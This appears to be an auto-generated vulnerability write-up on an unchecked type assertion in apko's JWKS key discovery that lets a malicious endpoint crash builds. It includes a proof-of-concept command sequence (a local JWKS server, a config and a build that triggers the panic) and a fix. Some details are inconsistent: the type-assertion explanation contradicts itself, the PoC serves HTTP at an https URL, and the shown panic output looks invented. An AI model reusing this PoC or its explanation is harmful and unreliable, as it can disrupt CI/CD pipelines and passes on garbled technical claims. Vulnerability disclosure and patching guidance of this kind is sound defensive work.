Listen to this Post
The vulnerability resides in the `DiscoverKeys` function within the `pkg/apk/apk/implementation.go` file. The core issue is an unchecked type assertion on a JSON Web Key Set (JWKS) response. The function unconditionally assumes every key fetched from a remote repository endpoint is an RSA public key. In the Go programming language, a type assertion of the form `key.(rsa.PublicKey)` returns two values: the underlying value if the assertion succeeds, or a runtime panic if it fails. The code path in `DiscoverKeys` discards the second (boolean) return value, leading to a crash when any non-RSA key type, such as Elliptic Curve (EC) or HMAC keys, is encountered. This flaw is triggered during the initialization process of the APK (Alpine Package Keeper) database when it fetches signing keys. An attacker can exploit this by compromising or controlling a package repository’s JWKS endpoint to return a valid, but non-RSA, key. Consequently, any client build or deployment workflow that attempts to use a synchronized repository list containing the malicious endpoint will immediately crash. This creates a denial-of-service (DoS) condition against CI/CD pipelines, container image builds, or any other automation that relies on the apko tool for secure package management.
dailycve Form
Platform: ……. apko (Go)
Version: …….. <=0.30.34
Vulnerability :…… Unchecked assertion
Severity: ……. Moderate
date: ………. May 4, 2026
Prediction: … June 15, 2026
What Undercode Say:
1. Simulate a malicious JWKS endpoint returning an EC key
echo '{"keys":[{"kty":"EC","crv":"P-256","kid":"malicious","x":"...","y":"..."}]}' > malicious_jwks.json
python3 -m http.server 8080 --bind 127.0.0.1 --directory . &
2. Configure apko to use the malicious endpoint
cat <<EOF > apko_repo_malicious.yaml
repositories:
- https://localhost:8080/malicious_jwks.json
EOF
3. Trigger the crash
apko build apko_repo_malicious.yaml /tmp/output
Output: panic: interface conversion: fmt.Stringer is ecdsa.PublicKey, not rsa.PublicKey
Exploit:
The exploit is trivial: an attacker with control over a repository’s JWKS endpoint simply returns a valid non-RSA key. Since no type check occurs, the application panics.
Protection:
Implement type checking before type assertion. For example:
if rsaKey, ok := key.(rsa.PublicKey); ok {
// handle RSA key
} else {
// return an error gracefully
}
Replace the current code: `rsaKey := key.(rsa.PublicKey)`.
Impact:
Denial of service (DoS) in any pipeline or system that uses apko to fetch repository keys, crashing the process and halting all dependent build or deployment operations.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
